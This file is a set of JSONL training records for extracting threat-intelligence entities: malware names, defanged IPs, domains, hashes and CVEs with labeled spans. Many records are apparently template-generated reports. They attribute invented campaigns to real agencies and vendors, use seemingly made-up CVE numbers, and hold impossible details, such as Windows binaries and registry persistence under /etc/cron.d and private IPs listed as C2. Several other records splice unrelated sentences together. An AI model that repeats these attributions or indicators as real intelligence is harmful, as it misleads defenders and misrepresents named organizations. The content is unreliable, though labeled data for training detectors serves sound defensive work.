{"text": "Artifact Analysis for ShadowPad campaign:\nStage 1 dropper at C:\\Windows\\Tasks\\taskhost.exe - SHA1: 404c11c8a5513c340c0d3fef74a40d1c4eac14ba\nStage 2 loader at /etc/cron.d/runtime.dll - SHA256: 108b8d2d16aa2245253d3c10543774ce38c370589fbc3818a6137cf7d162b825\nFinal payload at /usr/local/bin/config.dat - SHA256: 0ddf3dd5691f6ba2b36bedd64dac60ba8b4c2003c852bf9c4b3dcda648c0bbd3\nExfiltration module - SHA1: 4575a8e18191b195177ee4042949494b43d4a7c8\nAll stages communicated with 192[.]89[.]237[.]198. LaZagne signatures detected in Stage 2.", "spans": {"Malware: ShadowPad": [[22, 31]], "Indicator: 404c11c8a5513c340c0d3fef74a40d1c4eac14ba": [[99, 139]], "Indicator: 108b8d2d16aa2245253d3c10543774ce38c370589fbc3818a6137cf7d162b825": [[192, 256]], "Indicator: 0ddf3dd5691f6ba2b36bedd64dac60ba8b4c2003c852bf9c4b3dcda648c0bbd3": [[310, 374]], "Indicator: 4575a8e18191b195177ee4042949494b43d4a7c8": [[403, 443]], "Indicator: 192.89.237.198": [[473, 493]]}, "info": {"id": "synth_v2_01977", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 BehavesLike[.]Win32[.]Multiplug[.]ch Trojan:Win32/Autophyte.A!dha Backdoor/Win32.Akdoor.R198284", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Multiplug.ch": [[69, 105]]}, "info": {"id": "cyner2_train_000534", "source": "defanged_augment"}}
{"text": "This flaw allows an attacker to insert cookies at will into a running program\nusing libcurl, if the specific series of conditions are met.\n\nlibcurl performs transfers. In its API, an application creates \"easy handles\"\nthat are the individual handles for single transfers.\n\nlibcurl provides a function call that duplicates en easy handle called\n[curl_easy_duphandle](hxxps://curl[.]se/libcurl/c/curl_easy_duphandle.html).\n\nIf a transfer has cookies enabled when the handle is duplicated, the\ncookie-enable state is also cloned - but without cloning the actual\ncookies. If the source handle did not read any cookies from a specific file on\ndisk, the cloned version of the handle would instead store the file name as\n`none` (using the four ASCII letters, no quotes).\n\nSubsequent use of the cloned handle that does not explicitly set a source to\nload cookies from would then inadvertently load cookies from a file named\n`none` - if such a file exists and is readable in the current directory of the\nprogram using libcurl. And if using the correct file format of course.", "spans": {"Indicator: https://curl.se/libcurl/c/curl_easy_duphandle.html": [[366, 418]], "System: libcurl": [[84, 91], [140, 147], [273, 280], [1009, 1016]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-38546"}}
{"text": "Zscaler ThreatLabz published a threat intelligence report linking Ember Bear to a new campaign exploiting CVE-2021-10425 in F5 BIG-IP. The attackers deployed Vidar via Sliver, establishing C2 communication with 19 [ . ] 41 [ . ] 164 [ . ] 156 and portalstatic[ . ]io. A secondary payload was downloaded from hxxp://relaynode[.]cc/api/v2/auth. The malware binary (SHA1: a3c2a25cd751695ce81b16d01f567cc42b44e656) was dropped to C:\\Users\\Public\\Documents\\dropper.ps1. Phishing emails were sent from billing@identity-verify[ . ]cc targeting enterprise users. A backup C2 server was identified at 10 [ . ] 64 [ . ] 140 [ . ] 160.", "spans": {"Organization: Zscaler ThreatLabz": [[0, 18]], "Vulnerability: CVE-2021-10425": [[106, 120]], "System: F5 BIG-IP": [[124, 133]], "Malware: Vidar": [[158, 163]], "Indicator: 19.41.164.156": [[211, 242]], "Indicator: portalstatic.io": [[247, 266]], "Indicator: http://relaynode.cc/api/v2/auth": [[308, 341]], "Indicator: a3c2a25cd751695ce81b16d01f567cc42b44e656": [[369, 409]], "Indicator: billing@identity-verify.cc": [[496, 526]], "Indicator: 10.64.140.160": [[592, 623]]}, "info": {"id": "synth_v2_00039", "source": "defanged_augment"}}
{"text": "Electronicfrontierfoundation[ . ]org was not the only domain involved in this attack.", "spans": {"Indicator: Electronicfrontierfoundation.org": [[0, 36]]}, "info": {"id": "cyner2_train_005164", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Havoc artifacts at C:\\Windows\\System32\\loader.exe. Memory dump analysis confirmed execution of Hashcat. Registry modifications pointed to persistence via /etc/cron.d/ntds.dit. Network forensics identified connections to 10 [ . ] 43 [ . ] 182 [ . ] 249 and proxy-relay[ . ]tech. Email headers traced the initial vector to confirm@account-update[ . ]xyz. File C:\\Windows\\Tasks\\payload.bin (SHA1: cfc8d12241a5d24a9b2c8808ba471120108cc75a) was identified as the initial dropper. A staging URL hxxp://secure-portal[ . ]org/portal/verify resolved to 185 [ . ] 111 [ . ] 125 [ . ] 221. Secondary artifact hash: MD5: af0b6abbf3b0dc5964b3536a85a2bfe6.", "spans": {"Indicator: 10.43.182.249": [[292, 323]], "Indicator: proxy-relay.tech": [[328, 348]], "Indicator: confirm@account-update.xyz": [[393, 423]], "Indicator: cfc8d12241a5d24a9b2c8808ba471120108cc75a": [[466, 506]], "Indicator: http://secure-portal.org/portal/verify": [[561, 603]], "Indicator: 185.111.125.221": [[616, 649]], "Indicator: af0b6abbf3b0dc5964b3536a85a2bfe6": [[681, 713]]}, "info": {"id": "synth_v2_01172", "source": "defanged_augment"}}
{"text": "Blog Post by Europol: Tracking Gamaredon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2023-16619 against Juniper SRX deployments. The initial access vector involves spear-phishing emails from admin@credential-check[.]site delivering AgentTesla. Post-compromise, the attackers deploy QakBot and use Burp Suite for reconnaissance. C2 infrastructure includes 75[.]51[.]203[.]70 and cdnnode[ . ]site. A staging server at hxxp://cache-storage[ . ]xyz/download/update.exe hosts additional tooling. Key artifact: C:\\Windows\\System32\\backdoor.elf (SHA256: ca75918ba9553a2d2b86a1b6adcf61e66715933cff2a596a896dfa3d404837ab).", "spans": {"Organization: Europol": [[13, 20]], "Vulnerability: CVE-2023-16619": [[120, 134]], "System: Juniper SRX": [[143, 154]], "Indicator: admin@credential-check.site": [[230, 259]], "Malware: AgentTesla": [[271, 281]], "Malware: QakBot": [[321, 327]], "Indicator: 75.51.203.70": [[394, 412]], "Indicator: cdnnode.site": [[417, 433]], "Indicator: hxxp://cache-storage.xyz/download/update.exe": [[455, 503]], "Indicator: ca75918ba9553a2d2b86a1b6adcf61e66715933cff2a596a896dfa3d404837ab": [[586, 650]]}, "info": {"id": "synth_v2_01510", "source": "defanged_augment"}}
{"text": "Artifact Analysis for BatLoader campaign:\nStage 1 dropper at C:\\ProgramData\\agent.py - SHA1: f8989b56cc480be9ae80b2fa721e3be19fc95aa4\nStage 2 loader at /opt/app/bin/config.dat - MD5: 53eecbd9df190056a69c90861f6f1112\nFinal payload at /opt/app/bin/payload.bin - MD5: ccb0dd1d4b6b2bf6c52e923b70514a4f\nExfiltration module - MD5: 0eeffd30add4ff0ce1eba5ce0ce31a3e\nAll stages communicated with 77 [ . ] 194 [ . ] 162 [ . ] 222. Seatbelt signatures detected in Stage 2.", "spans": {"Malware: BatLoader": [[22, 31]], "Indicator: f8989b56cc480be9ae80b2fa721e3be19fc95aa4": [[93, 133]], "Indicator: 53eecbd9df190056a69c90861f6f1112": [[183, 215]], "Indicator: ccb0dd1d4b6b2bf6c52e923b70514a4f": [[265, 297]], "Indicator: 0eeffd30add4ff0ce1eba5ce0ce31a3e": [[325, 357]], "Indicator: 77.194.162.222": [[387, 419]]}, "info": {"id": "synth_v2_01927", "source": "defanged_augment"}}
{"text": "NSA published a threat intelligence report linking Mustang Panda to a new campaign exploiting CVE-2025-13087 in Windows Server 2019. The attackers deployed Lumma Stealer via PsExec, establishing C2 communication with 192 [ . ] 175 [ . ] 61 [ . ] 253 and portal-api[ . ]club. A secondary payload was downloaded from hxxps://auth-storage[ . ]tech/download/update.exe. The malware binary (MD5: c35be3fdba9bf683edaf783fa12b9c89) was dropped to C:\\Windows\\System32\\payload.bin. Phishing emails were sent from info@urgent-notice[.]online targeting enterprise users. A backup C2 server was identified at 178[.]67[.]244[.]19.", "spans": {"Organization: NSA": [[0, 3]], "Vulnerability: CVE-2025-13087": [[94, 108]], "System: Windows Server 2019": [[112, 131]], "Malware: Lumma Stealer": [[156, 169]], "Indicator: 192.175.61.253": [[217, 249]], "Indicator: portal-api.club": [[254, 273]], "Indicator: https://auth-storage.tech/download/update.exe": [[315, 364]], "Indicator: c35be3fdba9bf683edaf783fa12b9c89": [[391, 423]], "Indicator: info@urgent-notice.online": [[504, 531]], "Indicator: 178.67.244.19": [[597, 616]]}, "info": {"id": "synth_v2_00101", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Sharphound artifacts at C:\\Windows\\System32\\config.dat. Memory dump analysis confirmed execution of GhostPack. Registry modifications pointed to persistence via C:\\Users\\admin\\Downloads\\backdoor.elf. Network forensics identified connections to 10 [ . ] 210 [ . ] 125 [ . ] 48 and auth-edge[.]net. Email headers traced the initial vector to finance@mail-service[.]info. File C:\\Users\\Public\\Documents\\implant.so (SHA1: 212effc3dae43cd0de555adde2786da7c8973dfb) was identified as the initial dropper. A staging URL hxxps://securebackup[ . ]link/download/update.exe resolved to 172[.]160[.]157[.]231. Secondary artifact hash: SHA1: 4eb75ba1d6dbed442affdb929b07e49d88a8f53f.", "spans": {"Indicator: 10.210.125.48": [[316, 347]], "Indicator: auth-edge.net": [[352, 367]], "Indicator: finance@mail-service.info": [[412, 439]], "Indicator: 212effc3dae43cd0de555adde2786da7c8973dfb": [[490, 530]], "Indicator: https://securebackup.link/download/update.exe": [[585, 634]], "Indicator: 172.160.157.231": [[647, 668]], "Indicator: 4eb75ba1d6dbed442affdb929b07e49d88a8f53f": [[701, 741]]}, "info": {"id": "synth_v2_01134", "source": "defanged_augment"}}
{"text": "After investigation , QiAnXin suspect this attack is carried out by Molerats . It contains a Word document in plaintext ( written to Bienvenue_a_Sahaja_Yoga_Toulouse[ . ]doc ) , along with an executable ( Update[.]exe ) and DLL ( McUpdate[.]dll ) .", "spans": {"Organization: QiAnXin": [[22, 29]], "Indicator: Bienvenue_a_Sahaja_Yoga_Toulouse.doc": [[133, 173]], "Indicator: Update.exe": [[205, 217]], "Indicator: McUpdate.dll": [[230, 244]]}, "info": {"id": "cyberner_stix_train_001242", "source": "defanged_augment"}}
{"text": "The C2 server will then provide a secondary payload to the beacon in ASCII hexadecimal representation , which the Trojan will decode and write to the following location : %APPDATA%\\Roaming\\Audio\\soundfix[ . ]exe .", "spans": {"Malware: Trojan": [[114, 120]], "Indicator: %APPDATA%\\Roaming\\Audio\\soundfix.exe": [[171, 211]]}, "info": {"id": "cyberner_stix_train_001787", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 81[.]42[.]56[.]41, the SentinelOne IR team identified BlackCat running as /opt/app/bin/agent.py. The threat actor, believed to be APT28, used Ligolo for credential harvesting and SharpHound for lateral movement. Exfiltrated data was sent to relayproxy[ . ]live and sync-secure[.]top. The initial dropper (MD5: ccf6264f30606e6fb640fdc1d6102059) was delivered via a phishing email from security@identity-verify[.]cc. A second C2 node was observed at 192[.]66[.]210[.]203, with a persistence mechanism writing to /tmp/chrome_helper.exe.", "spans": {"Indicator: 81.42.56.41": [[64, 81]], "Organization: SentinelOne": [[87, 98]], "Malware: BlackCat": [[118, 126]], "Indicator: relayproxy.live": [[305, 324]], "Indicator: sync-secure.top": [[329, 346]], "Indicator: ccf6264f30606e6fb640fdc1d6102059": [[374, 406]], "Indicator: security@identity-verify.cc": [[448, 477]], "Indicator: 192.66.210.203": [[512, 532]]}, "info": {"id": "synth_v2_00261", "source": "defanged_augment"}}
{"text": "CVE-2026-23778: Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7 [ . ] 7 [ . ] 1 [ . ] 0 through 8.5, LTS2025 release version 8 [ . ] 3 [ . ] 1 [ . ] 0 through 8[.]3[.]1[.]20, LTS2024 release versions 7[.]13[.]1[.]0 through 7 [ . ] 13 [ . ] 1 [ . ] 50, contain a command injection vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability to gain root-level access.", "spans": {"Vulnerability: CVE-2026-23778": [[0, 14]], "Vulnerability: command injection": [[316, 333]], "Indicator: 7.7.1.0": [[116, 141]], "Indicator: 8.3.1.0": [[179, 204]], "Indicator: 8.3.1.20": [[213, 227]], "Indicator: 7.13.1.0": [[254, 268]], "Indicator: 7.13.1.50": [[277, 304]]}, "info": {"id": "nvd_2026_23778", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Nmap artifacts at C:\\Users\\admin\\Downloads\\helper.sh. Memory dump analysis confirmed execution of BloodHound. Registry modifications pointed to persistence via /var/tmp/svchost.exe. Network forensics identified connections to 109 [ . ] 146 [ . ] 8 [ . ] 81 and securelogin[.]net. Email headers traced the initial vector to it@secure-verify[.]net. File C:\\Users\\admin\\Downloads\\shell.php (SHA1: 780a2f6055fd5b3ada318fb8cee450d1d9f50478) was identified as the initial dropper. A staging URL hxxp://api-edge[ . ]site/login resolved to 215 [ . ] 246 [ . ] 123 [ . ] 160. Secondary artifact hash: SHA256: df4e312cc92286b5477c912ee22ce7c27bf8a195ada2efe8af521773da1bc578.", "spans": {"Indicator: 109.146.8.81": [[298, 328]], "Indicator: securelogin.net": [[333, 350]], "Indicator: it@secure-verify.net": [[395, 417]], "Indicator: 780a2f6055fd5b3ada318fb8cee450d1d9f50478": [[466, 506]], "Indicator: http://api-edge.site/login": [[561, 591]], "Indicator: 215.246.123.160": [[604, 637]], "Indicator: df4e312cc92286b5477c912ee22ce7c27bf8a195ada2efe8af521773da1bc578": [[672, 736]]}, "info": {"id": "synth_v2_01152", "source": "defanged_augment"}}
{"text": "Blog Post by CrowdStrike: Tracking Silk Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2026-46256 against Cisco ASA deployments. The initial access vector involves spear-phishing emails from account@secure-verify[.]net delivering Conti. Post-compromise, the attackers deploy Dridex and use Merlin for reconnaissance. C2 infrastructure includes 172 [ . ] 14 [ . ] 198 [ . ] 27 and cdn-auth[.]net. A staging server at hxxp://relay-cloud[.]io/api/v2/auth hosts additional tooling. Key artifact: C:\\Windows\\Tasks\\config.dat (SHA1: 72d9accf70316f50e473b0cf5e8b14b57ab6c44b).", "spans": {"Organization: CrowdStrike": [[13, 24]], "Vulnerability: CVE-2026-46256": [[127, 141]], "System: Cisco ASA": [[150, 159]], "Indicator: account@secure-verify.net": [[235, 262]], "Malware: Conti": [[274, 279]], "Malware: Dridex": [[319, 325]], "Indicator: 172.14.198.27": [[388, 419]], "Indicator: cdn-auth.net": [[424, 438]], "Indicator: hxxp://relay-cloud.io/api/v2/auth": [[460, 495]], "Indicator: 72d9accf70316f50e473b0cf5e8b14b57ab6c44b": [[571, 611]]}, "info": {"id": "synth_v2_01584", "source": "defanged_augment"}}
{"text": "Starting in October 2016 , NewsBeef compromised a set of legitimate servers (shown below) , and injected JavaScript to redirect visitors to hxxp://analytics-google[ . ]org:69/Check.aspx .", "spans": {"Indicator: http://analytics-google.org:69/Check.aspx": [[140, 185]]}, "info": {"id": "dnrti_train_002882", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Secureworks identified a large-scale phishing operation. Emails originated from finance@credential-check[ . ]site and verify@account-update[.]xyz, spoofing legitimate services. Victims were directed to hxxp://updateedge[ . ]info/wp-content/uploads/doc.php which hosted a credential harvesting page on cdn-sync[.]net. A secondary link hxxps://sync-secure[ . ]xyz/panel/index.html delivered ShadowPad (SHA256: ee189d531cf1659610508af2b64eaca170c0d433c61be9309b43eecd3aa66773). The malware was saved to /home/user/.config/taskhost.exe and established C2 with 88[.]126[.]203[.]154.", "spans": {"Organization: Secureworks": [[26, 37]], "Indicator: finance@credential-check.site": [[106, 139]], "Indicator: verify@account-update.xyz": [[144, 171]], "Indicator: hxxp://updateedge.info/wp-content/uploads/doc.php": [[228, 281]], "Indicator: cdn-sync.net": [[327, 341]], "Indicator: https://sync-secure.xyz/panel/index.html": [[360, 404]], "Malware: ShadowPad": [[415, 424]], "Indicator: ee189d531cf1659610508af2b64eaca170c0d433c61be9309b43eecd3aa66773": [[434, 498]], "Indicator: 88.126.203.154": [[582, 602]]}, "info": {"id": "synth_v2_01065", "source": "defanged_augment"}}
{"text": "Ongoing activity While monitoring this particular threat , we found another XLoader variant posing as a pornography app aimed at South Korean users . Despite the differing sponsorship , penetration of Hong Kong and Taiwan-based media organizations continues to be a priority for China-based APT16 . Note the request number parameter is now 0001: 39e965e000caD60001679C79T[ . ]sample-domain[ . ]evil . The ransomware is a 64bit executable written in Rust and it recognises the following commandline parameters", "spans": {"Malware: XLoader": [[76, 83]], "Organization: media organizations": [[228, 247]], "Indicator: 39e965e000caD60001679C79T.sample-domain.evil": [[346, 398]], "Malware: ransomware": [[405, 415]], "Malware: 64bit executable": [[421, 437]]}, "info": {"id": "cyberner_stix_train_003486", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 134[.]165[.]190[.]145, the Tenable IR team identified Gootloader running as /opt/app/bin/payload.bin. The threat actor, believed to be Aqua Blizzard, used Merlin for credential harvesting and Mythic for lateral movement. Exfiltrated data was sent to nodestatic[.]info and relaycloud[ . ]dev. The initial dropper (SHA1: 222742d9e290ccde12fc5c6ee3ccf51ba2c27269) was delivered via a phishing email from verify@phishing-domain[ . ]com. A second C2 node was observed at 10 [ . ] 148 [ . ] 104 [ . ] 206, with a persistence mechanism writing to C:\\Users\\admin\\Downloads\\loader.exe.", "spans": {"Indicator: 134.165.190.145": [[64, 85]], "Organization: Tenable": [[91, 98]], "Malware: Gootloader": [[118, 128]], "Indicator: nodestatic.info": [[314, 331]], "Indicator: relaycloud.dev": [[336, 354]], "Indicator: 222742d9e290ccde12fc5c6ee3ccf51ba2c27269": [[383, 423]], "Indicator: verify@phishing-domain.com": [[465, 495]], "Indicator: 10.148.104.206": [[530, 562]]}, "info": {"id": "synth_v2_00441", "source": "defanged_augment"}}
{"text": "This would explain the number of victims – there are less than 10 of them and according to our detection statistics , they are all located in the Russia . The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control ( C2 ) server to a victim 's system via dual proxies . At 23:29 , the attackers then proceeded to deploy an updated version of their POSHC2 stager . 192 [ . ] 119 [ . ] 15 [ . ] 35 880 hxxp://mynetwork[.]ddns[.]net:880/st-36-p4578.ps1 . The group 's long - standing center focus has been Ukraine , where it has carried out a campaign of disruptive and destructive attacks over the past decade using wiper malware , including during Russia 's re - invasion in 2022 .", "spans": {"Malware: POSHC2": [[402, 408]], "Indicator: 192.119.15.35 880": [[418, 453]], "Indicator: http://mynetwork.ddns.net:880/st-36-p4578.ps1": [[454, 503]], "Organization: Ukraine": [[557, 564]], "Malware: wiper malware": [[668, 681]]}, "info": {"id": "cyberner_stix_train_003078", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2021-32059 is a critical SSRF vulnerability affecting Ubuntu 22.04. Proofpoint confirmed active exploitation by BlackTech in the wild. Exploitation delivers Emotet (SHA256: 042fb290fe9035bf2a412109049ee3591bf6f44d89657d81b364a8cf376c0d45) which is dropped to C:\\Users\\admin\\Downloads\\sam.hive. The exploit payload is hosted at hxxps://edgecdn[.]net/collect and communicates to 2[.]246[.]33[.]16 for C2.", "spans": {"Vulnerability: CVE-2021-32059": [[24, 38]], "Vulnerability: SSRF vulnerability": [[53, 71]], "System: Ubuntu 22.04": [[82, 94]], "Organization: Proofpoint": [[96, 106]], "Malware: Emotet": [[185, 191]], "Indicator: 042fb290fe9035bf2a412109049ee3591bf6f44d89657d81b364a8cf376c0d45": [[201, 265]], "Indicator: hxxps://edgecdn.net/collect": [[355, 384]], "Indicator: 2.246.33.16": [[405, 422]]}, "info": {"id": "synth_v2_00783", "source": "defanged_augment"}}
{"text": "Blog Post by Rapid7: Tracking Scattered Spider's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2022-13003 against F5 BIG-IP deployments. The initial access vector involves spear-phishing emails from security@phishing-domain[ . ]com delivering BlackCat. Post-compromise, the attackers deploy RedLine Stealer and use Ligolo for reconnaissance. C2 infrastructure includes 69[.]137[.]182[.]87 and proxyportal[ . ]live. A staging server at hxxps://clouddata[.]live/assets/js/payload.js hosts additional tooling. Key artifact: /opt/app/bin/svchost.exe (MD5: b6727a0c5c74e576c9a925426bc83fd8).", "spans": {"Organization: Rapid7": [[13, 19]], "Vulnerability: CVE-2022-13003": [[126, 140]], "System: F5 BIG-IP": [[149, 158]], "Indicator: security@phishing-domain.com": [[234, 266]], "Malware: BlackCat": [[278, 286]], "Malware: RedLine Stealer": [[326, 341]], "Indicator: 69.137.182.87": [[404, 423]], "Indicator: proxyportal.live": [[428, 448]], "Indicator: https://clouddata.live/assets/js/payload.js": [[470, 515]], "Indicator: b6727a0c5c74e576c9a925426bc83fd8": [[587, 619]]}, "info": {"id": "synth_v2_01619", "source": "defanged_augment"}}
{"text": "Google TAG detected a multi-stage attack chain. The initial phishing email from account@login-portal[ . ]tech contained a link to hxxps://dataedge[.]info/panel/index.html. This redirected to hxxp://storageproxy[ . ]dev/api/v2/auth on updateproxy[.]cc. A secondary email from billing@credential-check[.]site pointed to hxxp://portalmail[.]top/download/update.exe which delivered DanaBot. The final payload callback was hxxp://sync-mail[ . ]live/callback resolving to 172 [ . ] 57 [ . ] 180 [ . ] 214 via data-backup[.]com.", "spans": {"Organization: Google TAG": [[0, 10]], "Indicator: account@login-portal.tech": [[80, 109]], "Indicator: hxxps://dataedge.info/panel/index.html": [[130, 170]], "Indicator: http://storageproxy.dev/api/v2/auth": [[191, 230]], "Indicator: updateproxy.cc": [[234, 250]], "Indicator: billing@credential-check.site": [[275, 306]], "Indicator: http://portalmail.top/download/update.exe": [[318, 361]], "Malware: DanaBot": [[378, 385]], "Indicator: hxxp://sync-mail.live/callback": [[418, 452]], "Indicator: 172.57.180.214": [[466, 498]], "Indicator: data-backup.com": [[503, 520]]}, "info": {"id": "synth_v2_01844", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 152[.]65[.]132[.]3, the NSA IR team identified StealC running as C:\\Windows\\Tasks\\config.dat. The threat actor, believed to be Silk Typhoon, used Havoc for credential harvesting and Ligolo for lateral movement. Exfiltrated data was sent to cdnmail[ . ]club and static-gateway[ . ]club. The initial dropper (MD5: ef65f23e3e18566f546f1b71a2731010) was delivered via a phishing email from finance@mail-service[ . ]info. A second C2 node was observed at 192[.]64[.]73[.]97, with a persistence mechanism writing to C:\\Windows\\Tasks\\csrss.exe.", "spans": {"Indicator: 152.65.132.3": [[64, 82]], "Organization: NSA": [[88, 91]], "Malware: StealC": [[111, 117]], "Indicator: cdnmail.club": [[304, 320]], "Indicator: static-gateway.club": [[325, 348]], "Indicator: ef65f23e3e18566f546f1b71a2731010": [[376, 408]], "Indicator: finance@mail-service.info": [[450, 479]], "Indicator: 192.64.73.97": [[514, 532]]}, "info": {"id": "synth_v2_00343", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: NCSC identified a large-scale phishing operation. Emails originated from service@auth-check[.]org and account@document-share[ . ]link, spoofing legitimate services. Victims were directed to hxxps://cloudstorage[.]cc/admin/config which hosted a credential harvesting page on api-sync[ . ]club. A secondary link hxxps://updateedge[.]site/collect delivered RedLine Stealer (MD5: 5d086aed358d43679fd6aa0fbb4af342). The malware was saved to /tmp/backdoor.elf and established C2 with 102 [ . ] 198 [ . ] 113 [ . ] 22.", "spans": {"Organization: NCSC": [[26, 30]], "Indicator: service@auth-check.org": [[99, 123]], "Indicator: account@document-share.link": [[128, 159]], "Indicator: https://cloudstorage.cc/admin/config": [[216, 254]], "Indicator: api-sync.club": [[300, 317]], "Indicator: hxxps://updateedge.site/collect": [[336, 369]], "Malware: RedLine Stealer": [[380, 395]], "Indicator: 5d086aed358d43679fd6aa0fbb4af342": [[402, 434]], "Indicator: 102.198.113.22": [[504, 536]]}, "info": {"id": "synth_v2_00853", "source": "defanged_augment"}}
{"text": "Kaspersky GReAT published a threat intelligence report linking Salt Typhoon to a new campaign exploiting CVE-2024-23826 in Ubuntu 22.04. The attackers deployed Cobalt Strike via Brute Ratel, establishing C2 communication with 222 [ . ] 60 [ . ] 121 [ . ] 54 and cloud-cloud[.]link. A secondary payload was downloaded from hxxps://cache-mail[ . ]io/collect. The malware binary (SHA1: 35bacded5f7164a9f324e9f0a7b6a46198f5108c) was dropped to C:\\Users\\admin\\Downloads\\winlogon.exe. Phishing emails were sent from finance@mail-service[ . ]info targeting enterprise users. A backup C2 server was identified at 221[.]219[.]84[.]158.", "spans": {"Organization: Kaspersky GReAT": [[0, 15]], "Vulnerability: CVE-2024-23826": [[105, 119]], "System: Ubuntu 22.04": [[123, 135]], "Malware: Cobalt Strike": [[160, 173]], "Indicator: 222.60.121.54": [[226, 257]], "Indicator: cloud-cloud.link": [[262, 280]], "Indicator: https://cache-mail.io/collect": [[322, 355]], "Indicator: 35bacded5f7164a9f324e9f0a7b6a46198f5108c": [[383, 423]], "Indicator: finance@mail-service.info": [[510, 539]], "Indicator: 221.219.84.158": [[605, 625]]}, "info": {"id": "synth_v2_00097", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: XLoader (SHA1: 78ddfbc06827b192534dbac65e30dbe4de674a9a). Upon execution on Citrix NetScaler, the sample creates /var/tmp/update.dll and injects into legitimate processes. Network analysis shows beaconing to 10[.]193[.]169[.]170 every 60 seconds and DNS queries to synclogin[ . ]org. The second stage was fetched from hxxps://api-static[.]site/callback and written to C:\\Users\\admin\\AppData\\Local\\Temp\\agent.py. The payload uses Mimikatz-style techniques for defense evasion. A secondary hash (SHA256: 62bb9ca27c26a2f3112ad3ea4ae968d801463a1444673780271e5c5ad10bf89a) was extracted from the unpacked payload.", "spans": {"Malware: XLoader": [[25, 32]], "Indicator: 78ddfbc06827b192534dbac65e30dbe4de674a9a": [[40, 80]], "System: Citrix NetScaler": [[101, 117]], "Indicator: 10.193.169.170": [[233, 253]], "Indicator: synclogin.org": [[290, 307]], "Indicator: https://api-static.site/callback": [[343, 377]], "Indicator: 62bb9ca27c26a2f3112ad3ea4ae968d801463a1444673780271e5c5ad10bf89a": [[527, 591]]}, "info": {"id": "synth_v2_00605", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 172 [ . ] 78 [ . ] 107 [ . ] 218, the Proofpoint IR team identified Qbot running as /opt/app/bin/ntds.dit. The threat actor, believed to be TA505, used WinPEAS for credential harvesting and Ligolo for lateral movement. Exfiltrated data was sent to portalbackup[ . ]live and update-edge[.]site. The initial dropper (MD5: d23036f0b080a5ae8a4a460e6f47feb1) was delivered via a phishing email from info@urgent-notice[.]online. A second C2 node was observed at 192[.]26[.]91[.]220, with a persistence mechanism writing to /dev/shm/csrss.exe.", "spans": {"Indicator: 172.78.107.218": [[64, 96]], "Organization: Proofpoint": [[102, 112]], "Malware: Qbot": [[132, 136]], "Indicator: portalbackup.live": [[312, 333]], "Indicator: update-edge.site": [[338, 356]], "Indicator: d23036f0b080a5ae8a4a460e6f47feb1": [[384, 416]], "Indicator: info@urgent-notice.online": [[458, 485]], "Indicator: 192.26.91.220": [[520, 539]]}, "info": {"id": "synth_v2_00334", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Backdoor.Irc.Mimic.C Trojan.Glitch.A BKDR_IRCMIMIC.C IRC/Mimic.C Hacktool.Flooder BKDR_IRCMIMIC.C Win.Trojan.Soldier-7 Backdoor.IRC.Mimic.c Backdoor.Irc.Mimic.C DoS.W32.LifeWare!c Backdoor.Irc.Mimic.C DDoS.LifeWire BehavesLike.Win32.PWSZbot.bc Trojan.Win32.DoS IRC/Mimic.C IRC/Mimic.8 HackTool[DoS]/Win32.LifeWare DDoS:Win32/LifeWire.A Backdoor.IRC.Mimic.c DoS.LifeWare Trojan.HideWindows Bck/Iroffer[.]BG Irc.Backdoor.Mimic.Htmt VBS.Flood.L W32/LifeWare.A!dos Win32/Virus.IRC.f2c", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Iroffer.BG": [[419, 431]]}, "info": {"id": "cyner2_train_006867", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Virus.W32.Virus!c Trojan/Spy[ . ]KeyLogger[ . ]au Trojan.Raw.KeyLog.epwywq BehavesLike.Win32.Cutwail.tc Trojan.Shelma.bbh Trojan/Win32.Shelma Trojan:Win32/Ronohu.A Trj/CI.A Python/Spy.KeyLogger.V Trojan.Python.Spy Python/KeyLogger.V!tr.spy", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Spy.KeyLogger.au": [[51, 75]]}, "info": {"id": "cyner2_train_004120", "source": "defanged_augment"}}
{"text": "Malware code showing handover from initial module to main payload Figure 13 . APT15 is known for committing cyberespionage against companies and organizations located in many different countries , targeting different sectors such as the oil industry , government contractors , military , and more . We used different archiving tools such as PowerArchiver 2019 , WinZip , WinRar , 7Zip , and unzIP S-TOOL that is built into the Windows OS in attempting to extract the content of the attachment SHIPPING_MX00034900_PL_INV_pdf[ . ]zip . While this shift likely reflects the increased tempo of wartime cyber operations , it also reveals the GRU ’s priority objectives in OT attacks .", "spans": {"Organization: oil industry": [[237, 249]], "Organization: government contractors": [[252, 274]], "Organization: military": [[277, 285]], "System: Windows": [[427, 434]], "Indicator: SHIPPING_MX00034900_PL_INV_pdf.zip": [[493, 531]]}, "info": {"id": "cyberner_stix_train_000349", "source": "defanged_augment"}}
